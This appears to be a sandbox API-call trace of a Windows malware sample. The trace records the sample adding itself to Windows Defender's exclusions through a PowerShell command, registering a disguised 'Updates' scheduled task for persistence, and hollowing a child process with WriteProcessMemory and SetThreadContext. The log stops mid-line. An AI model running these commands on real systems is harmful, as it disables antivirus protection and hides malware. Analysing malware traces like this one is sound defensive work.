[0142.122] LsaOpenPolicy (in: SystemName=0x0, ObjectAttributes=0x17df70, DesiredAccess=0x800, PolicyHandle=0x17df30 | out: PolicyHandle=0x17df30) returned 0x0
[0142.122] CoTaskMemAlloc (cb=0x8) returned 0x6d1130
[0142.122] CoTaskMemAlloc (cb=0x14) returned 0x6aaba8
[0142.123] LsaLookupNames2 (in: PolicyHandle=0x6aa8a8, Flags=0x0, Count=0x1, Names="kEecfMwgj", ReferencedDomains=0x17df44, Sids=0x17df38 | out: ReferencedDomains=0x17df44, Sids=0x17df38) returned 0x0
[0142.124] CoTaskMemFree (pv=0x6aaba8)
[0142.124] CoTaskMemFree (pv=0x6d1130)
[0142.124] LsaClose (ObjectHandle=0x6aa8a8) returned 0x0
[0142.124] LsaFreeMemory (Buffer=0x68f440) returned 0x0
[0142.124] LsaFreeMemory (Buffer=0x65f5f0) returned 0x0
[0142.125] LsaOpenPolicy (in: SystemName=0x0, ObjectAttributes=0x17df70, DesiredAccess=0x800, PolicyHandle=0x17df30 | out: PolicyHandle=0x17df30) returned 0x0
[0142.126] CoTaskMemAlloc (cb=0x8) returned 0x6d1130
[0142.126] CoTaskMemAlloc (cb=0x14) returned 0x6aaba8
[0142.126] LsaLookupNames2 (in: PolicyHandle=0x6aa8a8, Flags=0x0, Count=0x1, Names="kEecfMwgj", ReferencedDomains=0x17df44, Sids=0x17df38 | out: ReferencedDomains=0x17df44, Sids=0x17df38) returned 0x0
[0142.127] CoTaskMemFree (pv=0x6aaba8)
[0142.127] CoTaskMemFree (pv=0x6d1130)
[0142.127] LsaClose (ObjectHandle=0x6aa8a8) returned 0x0
[0142.128] LsaFreeMemory (Buffer=0x68f440) returned 0x0
[0142.128] LsaFreeMemory (Buffer=0x65f5f0) returned 0x0
[0142.129] LsaOpenPolicy (in: SystemName=0x0, ObjectAttributes=0x17df70, DesiredAccess=0x800, PolicyHandle=0x17df30 | out: PolicyHandle=0x17df30) returned 0x0
[0142.129] CoTaskMemAlloc (cb=0x8) returned 0x6d1130
[0142.129] CoTaskMemAlloc (cb=0x14) returned 0x6aaba8
[0142.130] LsaLookupNames2 (in: PolicyHandle=0x6aa8a8, Flags=0x0, Count=0x1, Names="kEecfMwgj", ReferencedDomains=0x17df44, Sids=0x17df38 | out: ReferencedDomains=0x17df44, Sids=0x17df38) returned 0x0
[0142.130] CoTaskMemFree (pv=0x6aaba8)
[0142.130] CoTaskMemFree (pv=0x6d1130)
[0142.130] LsaClose (ObjectHandle=0x6aa8a8) returned 0x0
[0142.131] LsaFreeMemory (Buffer=0x68f440) returned 0x0
[0142.131] LsaFreeMemory (Buffer=0x65f5f0) returned 0x0
[0142.131] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\nFxIoujoILCO.exe", nBufferLength=0x105, lpBuffer=0x17dc20, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Roaming\\nFxIoujoILCO.exe", lpFilePart=0x0) returned 0x33
[0142.131] SetNamedSecurityInfoW () returned 0x0
[0142.260] GetCurrentProcess () returned 0xffffffff
[0142.260] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x17e038 | out: TokenHandle=0x17e038*=0x29c) returned 1
[0142.286] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x17e030 | out: TokenInformation=0x0, ReturnLength=0x17e030) returned 0
[0142.287] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x6d1180
[0142.287] GetTokenInformation (in: TokenHandle=0x29c, TokenInformationClass=0x8, TokenInformation=0x6d1180, TokenInformationLength=0x4, ReturnLength=0x17e030 | out: TokenInformation=0x6d1180, ReturnLength=0x17e030) returned 1
[0142.287] LocalFree (hMem=0x6d1180) returned 0x0
[0142.288] DuplicateTokenEx (in: hExistingToken=0x29c, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x17e038 | out: phNewToken=0x17e038*=0x2a0) returned 1
[0142.289] CheckTokenMembership (in: TokenHandle=0x2a0, SidToCheck=0x290af40*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x17e048 | out: IsMember=0x17e048) returned 1
[0142.289] CloseHandle (hObject=0x2a0) returned 1
[0142.620] LocalAlloc (uFlags=0x0, uBytes=0x16) returned 0x6aa8a8
[0142.620] LocalAlloc (uFlags=0x0, uBytes=0xac) returned 0x6af800
[0142.623] ShellExecuteExW (in: pExecInfo=0x2914558*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="powershell", lpParameters="Add-MpPreference -ExclusionPath \"C:\\Users\\kEecfMwgj\\AppData\\Roaming\\nFxIoujoILCO.exe\"", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x2914558*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="powershell", lpParameters="Add-MpPreference -ExclusionPath \"C:\\Users\\kEecfMwgj\\AppData\\Roaming\\nFxIoujoILCO.exe\"", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x3b0)) returned 1
[0152.410] LocalFree (hMem=0x6aa8a8) returned 0x0
[0152.411] LocalFree (hMem=0x6af800) returned 0x0
[0152.416] GetCurrentProcess () returned 0xffffffff
[0152.416] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x17e0d8 | out: TokenHandle=0x17e0d8*=0x2a8) returned 1
[0152.427] GetCurrentProcess () returned 0xffffffff
[0152.427] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x2000000, TokenHandle=0x17e0a8 | out: TokenHandle=0x17e0a8*=0x360) returned 1
[0152.429] GetTokenInformation (in: TokenHandle=0x2a8, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x17e0dc | out: TokenInformation=0x0, ReturnLength=0x17e0dc) returned 0
[0152.429] LocalAlloc (uFlags=0x0, uBytes=0x24) returned 0x6ed500
[0152.429] GetTokenInformation (in: TokenHandle=0x2a8, TokenInformationClass=0x1, TokenInformation=0x6ed500, TokenInformationLength=0x24, ReturnLength=0x17e0dc | out: TokenInformation=0x6ed500, ReturnLength=0x17e0dc) returned 1
[0152.430] LocalFree (hMem=0x6ed500) returned 0x0
[0152.432] LsaOpenPolicy (in: SystemName=0x0, ObjectAttributes=0x17e004, DesiredAccess=0x800, PolicyHandle=0x17dfc4 | out: PolicyHandle=0x17dfc4) returned 0x0
[0152.435] LsaLookupSids (in: PolicyHandle=0x6aa8a8, Count=0x1, Sids=0x2914848*=0x29147ec*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), ReferencedDomains=0x17dfe0, Names=0x17dfd4 | out: ReferencedDomains=0x17dfe0, Names=0x17dfd4) returned 0x0
[0152.439] LsaClose (ObjectHandle=0x6aa8a8) returned 0x0
[0152.439] LsaFreeMemory (Buffer=0x68f590) returned 0x0
[0152.439] LsaFreeMemory (Buffer=0x6ed500) returned 0x0
[0152.440] CloseHandle (hObject=0x360) returned 1
[0152.522] CoTaskMemAlloc (cb=0x20c) returned 0x6f0a48
[0152.522] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x6f0a48 | out: lpBuffer="C:\\Users\\KEECFM~1\\AppData\\Local\\Temp\\") returned 0x25
[0152.523] CoTaskMemFree (pv=0x6f0a48)
[0152.523] GetLongPathNameW (in: lpszShortPath="C:\\Users\\KEECFM~1\\", lpszLongPath=0x17dbf4, cchBuffer=0x104 | out: lpszLongPath="C:\\Users\\kEecfMwgj\\") returned 0x13
[0152.524] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\", nBufferLength=0x105, lpBuffer=0x17dc08, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\", lpFilePart=0x0) returned 0x26
[0152.525] CoTaskMemAlloc (cb=0x20c) returned 0x6f0a48
[0152.525] GetTempFileNameW (in: lpPathName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\", lpPrefixString="tmp", uUnique=0x0, lpTempFileName=0x6f0a48 | out: lpTempFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpC690.tmp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\tmpc690.tmp")) returned 0xc690
[0152.532] CoTaskMemFree (pv=0x6f0a48)
[0152.583] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpC690.tmp", nBufferLength=0x105, lpBuffer=0x17dab8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpC690.tmp", lpFilePart=0x0) returned 0x31
[0152.583] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x17dfd0) returned 1
[0152.584] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpC690.tmp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\tmpc690.tmp"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2a4
[0152.584] GetFileType (hFile=0x2a4) returned 0x1
[0152.584] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x17dfcc) returned 1
[0152.584] GetFileType (hFile=0x2a4) returned 0x1
[0152.586] WriteFile (in: hFile=0x2a4, lpBuffer=0x2918db0*, nNumberOfBytesToWrite=0x640, lpNumberOfBytesWritten=0x17e05c, lpOverlapped=0x0 | out: lpBuffer=0x2918db0*, lpNumberOfBytesWritten=0x17e05c*=0x640, lpOverlapped=0x0) returned 1
[0152.588] CloseHandle (hObject=0x2a4) returned 1
[0152.607] LocalAlloc (uFlags=0x0, uBytes=0x1a) returned 0x6eded0
[0152.607] LocalAlloc (uFlags=0x0, uBytes=0xb8) returned 0x6f7a60
[0152.608] ShellExecuteExW (in: pExecInfo=0x291a654*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="schtasks.exe", lpParameters="/Create /TN \"Updates\\nFxIoujoILCO\" /XML \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpC690.tmp\"", lpDirectory=0x0, nShow=0, hInstApp=0x0, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x0) | out: pExecInfo=0x291a654*(cbSize=0x3c, fMask=0x540, hwnd=0x0, lpVerb=0x0, lpFile="schtasks.exe", lpParameters="/Create /TN \"Updates\\nFxIoujoILCO\" /XML \"C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpC690.tmp\"", lpDirectory=0x0, nShow=0, hInstApp=0x2a, lpIDList=0x0, lpClass=0x0, hkeyClass=0x0, dwHotKey=0x0, hIcon=0x0, hMonitor=0x0, hProcess=0x36c)) returned 1
[0152.671] LocalFree (hMem=0x6eded0) returned 0x0
[0152.671] LocalFree (hMem=0x6f7a60) returned 0x0
[0153.151] GetCurrentProcess () returned 0xffffffff
[0153.151] GetCurrentProcess () returned 0xffffffff
[0153.151] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x36c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x17e0c0, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x17e0c0*=0x360) returned 1
[0153.154] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x17e0b8*=0x360, lpdwindex=0x17dedc | out: lpdwindex=0x17dedc) returned 0x0
[0155.038] CloseHandle (hObject=0x360) returned 1
[0155.039] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpC690.tmp", nBufferLength=0x105, lpBuffer=0x17dc18, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpC690.tmp", lpFilePart=0x0) returned 0x31
[0155.041] DeleteFileW (lpFileName="C:\\Users\\kEecfMwgj\\AppData\\Local\\Temp\\tmpC690.tmp" (normalized: "c:\\users\\keecfmwgj\\appdata\\local\\temp\\tmpc690.tmp")) returned 1
[0156.275] CreateFileMappingW (hFile=0xffffffff, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x36800, lpName=0x0) returned 0x360
[0156.275] memcpy (in: _Dst=0x4df0000, _Src=0x4421910, _Size=0x36800 | out: _Dst=0x4df0000) returned 0x4df0000
[0156.278] CloseHandle (hObject=0x360) returned 1
[0156.635] GetFullPathNameW (in: lpFileName="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe", nBufferLength=0x105, lpBuffer=0x17db6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe", lpFilePart=0x0) returned 0x5f
[0156.687] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", nBufferLength=0x105, lpBuffer=0x17d5ec, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\", lpFilePart=0x0) returned 0x2e
[0156.803] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe", cchWideChar=95, lpMultiByteStr=0x17ddc4, cbMultiByte=97, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe", lpUsedDefaultChar=0x0) returned 95
[0156.803] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="", cchWideChar=0, lpMultiByteStr=0x17ddc0, cbMultiByte=2, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x14\x0f\x92", lpUsedDefaultChar=0x0) returned 0
[0156.808] CreateProcessA (in: lpApplicationName="C:\\Users\\kEecfMwgj\\Desktop\\fded70e0d7bee0d44fdb8cd327a09f1a879d61cc35a57a4d2cba7d7d232eed18.exe", lpCommandLine="", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x8000004, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x17de84*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x17e198 | out: lpCommandLine="", lpProcessInformation=0x17e198*(hProcess=0x380, hThread=0x360, dwProcessId=0x830, dwThreadId=0x5c0)) returned 1
[0156.830] CoTaskMemFree (pv=0x0)
[0156.872] GetThreadContext (in: hThread=0x360, lpContext=0x296e688 | out: lpContext=0x296e688*(ContextFlags=0x10002, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x0, SegEs=0x0, SegDs=0x0, Edi=0x0, Esi=0x0, Ebx=0x7efde000, Edx=0x0, Ecx=0x0, Eax=0x1434c4e, Ebp=0x0, Eip=0x0, SegCs=0x0, EFlags=0x0, Esp=0x0, SegSs=0x0, ExtendedRegisters=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, 
[61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0, [80]=0x0, [81]=0x0, [82]=0x0, [83]=0x0, [84]=0x0, [85]=0x0, [86]=0x0, [87]=0x0, [88]=0x0, [89]=0x0, [90]=0x0, [91]=0x0, [92]=0x0, [93]=0x0, [94]=0x0, [95]=0x0, [96]=0x0, [97]=0x0, [98]=0x0, [99]=0x0, [100]=0x0, [101]=0x0, [102]=0x0, [103]=0x0, [104]=0x0, [105]=0x0, [106]=0x0, [107]=0x0, [108]=0x0, [109]=0x0, [110]=0x0, [111]=0x0, [112]=0x0, [113]=0x0, [114]=0x0, [115]=0x0, [116]=0x0, [117]=0x0, [118]=0x0, [119]=0x0, [120]=0x0, [121]=0x0, [122]=0x0, [123]=0x0, [124]=0x0, [125]=0x0, [126]=0x0, [127]=0x0, [128]=0x0, [129]=0x0, [130]=0x0, [131]=0x0, [132]=0x0, [133]=0x0, [134]=0x0, [135]=0x0, [136]=0x0, [137]=0x0, [138]=0x0, [139]=0x0, [140]=0x0, [141]=0x0, [142]=0x0, [143]=0x0, [144]=0x0, [145]=0x0, [146]=0x0, [147]=0x0, [148]=0x0, [149]=0x0, [150]=0x0, [151]=0x0, [152]=0x0, [153]=0x0, [154]=0x0, [155]=0x0, [156]=0x0, [157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, [211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, 
[246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, [392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, 
[427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1
[0156.873] ReadProcessMemory (in: hProcess=0x380, lpBaseAddress=0x7efde008, lpBuffer=0x17e188, nSize=0x4, lpNumberOfBytesRead=0x17e1cc | out: lpBuffer=0x17e188*, lpNumberOfBytesRead=0x17e1cc*=0x4) returned 1
[0156.873] VirtualAllocEx (hProcess=0x380, lpAddress=0x400000, dwSize=0x38000, flAllocationType=0x3000, flProtect=0x40) returned 0x400000
[0156.875] WriteProcessMemory (in: hProcess=0x380, lpBaseAddress=0x400000, lpBuffer=0x448ad50*, nSize=0x200, lpNumberOfBytesWritten=0x17e1cc | out: lpBuffer=0x448ad50*, lpNumberOfBytesWritten=0x17e1cc*=0x200) returned 1
[0156.925] WriteProcessMemory (in: hProcess=0x380, lpBaseAddress=0x402000, lpBuffer=0x44bd970*, nSize=0x1c800, lpNumberOfBytesWritten=0x17e1cc | out: lpBuffer=0x44bd970*, lpNumberOfBytesWritten=0x17e1cc*=0x1c800) returned 1
[0157.013] WriteProcessMemory (in: hProcess=0x380, lpBaseAddress=0x420000, lpBuffer=0x296f594*, nSize=0x200, lpNumberOfBytesWritten=0x17e1cc | out: lpBuffer=0x296f594*, lpNumberOfBytesWritten=0x17e1cc*=0x200) returned 1
[0157.020] WriteProcessMemory (in: hProcess=0x380, lpBaseAddress=0x422000, lpBuffer=0x44da190*, nSize=0x16000, lpNumberOfBytesWritten=0x17e1cc | out: lpBuffer=0x44da190*, lpNumberOfBytesWritten=0x17e1cc*=0x16000) returned 1
[0157.040] WriteProcessMemory (in: hProcess=0x380, lpBaseAddress=0x7efde008, lpBuffer=0x296faa0*, nSize=0x4, lpNumberOfBytesWritten=0x17e1cc | out: lpBuffer=0x296faa0*, lpNumberOfBytesWritten=0x17e1cc*=0x4) returned 1
[0157.040] SetThreadContext (hThread=0x360, lpContext=0x296e688*(ContextFlags=0x10002, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, 